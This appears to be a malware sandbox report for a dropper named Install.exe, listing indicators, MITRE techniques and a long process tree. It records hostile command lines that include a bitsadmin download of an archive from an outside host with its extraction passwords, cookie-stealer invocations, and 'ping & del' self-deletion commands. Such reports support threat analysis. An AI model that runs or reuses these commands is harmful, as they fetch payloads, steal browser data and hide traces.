010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Fyvicufaecae.exe

Runs ping.exe 1 TTPs 8 IoCs

Remote System Discovery

T1018

pid	Process
9392	PING.EXE
10072	PING.EXE
5880	PING.EXE
6728	PING.EXE
6552	PING.EXE
6988	PING.EXE
7536	PING.EXE
8180	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	539	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	547	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	224	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	229	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	532	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	537	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3420	ultramediaburner.tmp
3420	ultramediaburner.tmp
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3400	MicrosoftEdgeCP.exe
3400	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	4052	Ultra.exe
Token: SeDebugPrivilege	2972	Fyvicufaecae.exe
Token: SeDebugPrivilege	2308	Fazhasecusae.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	5076	KiffMainE1.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4524	828001925.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3420	ultramediaburner.tmp

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4144	MicrosoftEdge.exe
3400	MicrosoftEdgeCP.exe
3400	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 3988 wrote to memory of 1040	3988	Install.exe	73
PID 3988 wrote to memory of 1040	3988	Install.exe	73
PID 3988 wrote to memory of 1040	3988	Install.exe	73
PID 1040 wrote to memory of 4052	1040	Install.tmp	77
PID 1040 wrote to memory of 4052	1040	Install.tmp	77
PID 4052 wrote to memory of 3736	4052	Ultra.exe	80
PID 4052 wrote to memory of 3736	4052	Ultra.exe	80
PID 4052 wrote to memory of 3736	4052	Ultra.exe	80
PID 3736 wrote to memory of 3420	3736	ultramediaburner.exe	81
PID 3736 wrote to memory of 3420	3736	ultramediaburner.exe	81
PID 3736 wrote to memory of 3420	3736	ultramediaburner.exe	81
PID 4052 wrote to memory of 2972	4052	Ultra.exe	82
PID 4052 wrote to memory of 2972	4052	Ultra.exe	82
PID 3420 wrote to memory of 2132	3420	ultramediaburner.tmp	83
PID 3420 wrote to memory of 2132	3420	ultramediaburner.tmp	83
PID 4052 wrote to memory of 2308	4052	Ultra.exe	84
PID 4052 wrote to memory of 2308	4052	Ultra.exe	84
PID 2308 wrote to memory of 4640	2308	Fazhasecusae.exe	91
PID 2308 wrote to memory of 4640	2308	Fazhasecusae.exe	91
PID 4640 wrote to memory of 4808	4640	cmd.exe	93
PID 4640 wrote to memory of 4808	4640	cmd.exe	93
PID 4640 wrote to memory of 4808	4640	cmd.exe	93
PID 2308 wrote to memory of 4972	2308	Fazhasecusae.exe	94
PID 2308 wrote to memory of 4972	2308	Fazhasecusae.exe	94
PID 4972 wrote to memory of 5076	4972	cmd.exe	96
PID 4972 wrote to memory of 5076	4972	cmd.exe	96
PID 2308 wrote to memory of 4648	2308	Fazhasecusae.exe	98
PID 2308 wrote to memory of 4648	2308	Fazhasecusae.exe	98
PID 4648 wrote to memory of 4484	4648	cmd.exe	101
PID 4648 wrote to memory of 4484	4648	cmd.exe	101
PID 4648 wrote to memory of 4484	4648	cmd.exe	101
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	100
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	100
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	100
PID 4808 wrote to memory of 4524	4808	sskiper.exe	102
PID 4808 wrote to memory of 4524	4808	sskiper.exe	102
PID 4808 wrote to memory of 4524	4808	sskiper.exe	102
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	100
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	100
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	100

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3988
- C:\Users\Admin\AppData\Local\Temp\is-M9KDM.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-M9KDM.tmp\Install.tmp" /SL5="$2010E,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1040
- - C:\Users\Admin\AppData\Local\Temp\is-JAOL2.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-JAOL2.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe
      "C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3736
    - - C:\Users\Admin\AppData\Local\Temp\is-1MUHM.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1MUHM.tmp\ultramediaburner.tmp" /SL5="$90052,281924,62464,C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3420
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:2132
  - - C:\Users\Admin\AppData\Local\Temp\47-e109e-c8b-6c899-13f99d561cee8\Fyvicufaecae.exe
      "C:\Users\Admin\AppData\Local\Temp\47-e109e-c8b-6c899-13f99d561cee8\Fyvicufaecae.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:2972
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2116
        5⤵
        
        PID:4756
  - - C:\Users\Admin\AppData\Local\Temp\77-dc390-0e8-b78bc-f8388a0e088b5\Fazhasecusae.exe
      "C:\Users\Admin\AppData\Local\Temp\77-dc390-0e8-b78bc-f8388a0e088b5\Fazhasecusae.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe /s & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4640
      - C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe
        
        C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe /s
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\Temp\828001925.exe
        
        C:\Users\Admin\AppData\Local\Temp\828001925.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4524
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        8⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\654075992.exe
        
        C:\Users\Admin\AppData\Local\Temp\654075992.exe
        7⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe & exit
        7⤵
        
        PID:6664
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 0
        8⤵
        Runs ping.exe
        
        PID:6728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0cd3aoh.uei\KiffMainE1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4972
      - C:\Users\Admin\AppData\Local\Temp\c0cd3aoh.uei\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\c0cd3aoh.uei\KiffMainE1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbmxocgf.dod\001.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4648
      - C:\Users\Admin\AppData\Local\Temp\cbmxocgf.dod\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\cbmxocgf.dod\001.exe
        6⤵
        Executes dropped EXE
        
        PID:4484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        
        PID:4104
      - C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe /qn CAMPAIGN="654"
        6⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619883647 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:3912
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ocda2akp.czz\gpooe.exe & exit
        5⤵
        
        PID:5476
      - C:\Users\Admin\AppData\Local\Temp\ocda2akp.czz\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\ocda2akp.czz\gpooe.exe
        6⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:5316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe /s & exit
        5⤵
        
        PID:5900
      - C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe
        
        C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe /s
        6⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\1096704559.exe
        
        C:\Users\Admin\AppData\Local\Temp\1096704559.exe
        7⤵
        
        PID:5096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        8⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\605358738.exe
        
        C:\Users\Admin\AppData\Local\Temp\605358738.exe
        7⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe & exit
        7⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 0
        8⤵
        Runs ping.exe
        
        PID:6988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4dfxc5h.30k\google-game.exe & exit
        5⤵
        
        PID:5748
      - C:\Users\Admin\AppData\Local\Temp\o4dfxc5h.30k\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\o4dfxc5h.30k\google-game.exe
        6⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        7⤵
        
        PID:2868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ri4c0eoz.h1k\askinstall39.exe & exit
        5⤵
        
        PID:5576
      - C:\Users\Admin\AppData\Local\Temp\ri4c0eoz.h1k\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\ri4c0eoz.h1k\askinstall39.exe
        6⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:5728
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:5136
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe & exit
        5⤵
        
        PID:5988
      - C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe
        6⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\IdQboelc8d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IdQboelc8d.exe"
        7⤵
        
        PID:7068
        
        C:\Users\Admin\AppData\Roaming\1620142976325.exe
        
        "C:\Users\Admin\AppData\Roaming\1620142976325.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620142976325.txt"
        8⤵
        
        PID:6348
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\IdQboelc8d.exe"
        8⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:6552
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe"
        7⤵
        
        PID:7132
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:5800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe & exit
        5⤵
        
        PID:4560
      - C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe
        6⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe"
        7⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        8⤵
        Runs ping.exe
        
        PID:5880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe & exit
        5⤵
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
        6⤵
        
        PID:6028
        
        C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
        7⤵
        
        PID:5788
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lam2sc2g.cbn\GcleanerWW.exe /mixone & exit
        5⤵
        
        PID:6600
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\frez1g2k.l1i\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:6868
      - C:\Users\Admin\AppData\Local\Temp\frez1g2k.l1i\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\frez1g2k.l1i\SunLabsPlayer.exe /S
        6⤵
        
        PID:6932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:6280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:9200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:9600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:8232
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:8876
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        
        PID:4600
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p6HeFjZCP8gJJc0s -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:9448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
        7⤵
        
        PID:10036
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1l1lzebl.kyy\005.exe & exit
        5⤵
        
        PID:6984
      - C:\Users\Admin\AppData\Local\Temp\1l1lzebl.kyy\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\1l1lzebl.kyy\005.exe
        6⤵
        
        PID:7084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe /Verysilent /subid=623 & exit
        5⤵
        
        PID:5764
      - C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe
        
        C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe /Verysilent /subid=623
        6⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\is-0GTJ2.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0GTJ2.tmp\Setup3310.tmp" /SL5="$903D0,138429,56832,C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe" /Verysilent /subid=623
        7⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\is-8SDT7.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8SDT7.tmp\Setup.exe" /Verysilent
        8⤵
        
        PID:6652
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"
        9⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        10⤵
        
        PID:6028
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"
        9⤵
        
        PID:6744
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"
        9⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
        10⤵
        
        PID:7372
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im RunWW.exe /f
        11⤵
        Kills process with taskkill
        
        PID:8016
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        11⤵
        Delays execution with timeout.exe
        
        PID:7972
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"
        9⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:7288
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:5036
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"
        9⤵
        
        PID:6600
        
        C:\Users\Admin\AppData\Roaming\7832981.exe
        
        "C:\Users\Admin\AppData\Roaming\7832981.exe"
        10⤵
        
        PID:7108
        
        C:\Users\Admin\AppData\Roaming\7248702.exe
        
        "C:\Users\Admin\AppData\Roaming\7248702.exe"
        10⤵
        
        PID:4100
        
        C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        11⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Roaming\1482032.exe
        
        "C:\Users\Admin\AppData\Roaming\1482032.exe"
        10⤵
        
        PID:6476
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
        9⤵
        
        PID:6604
        
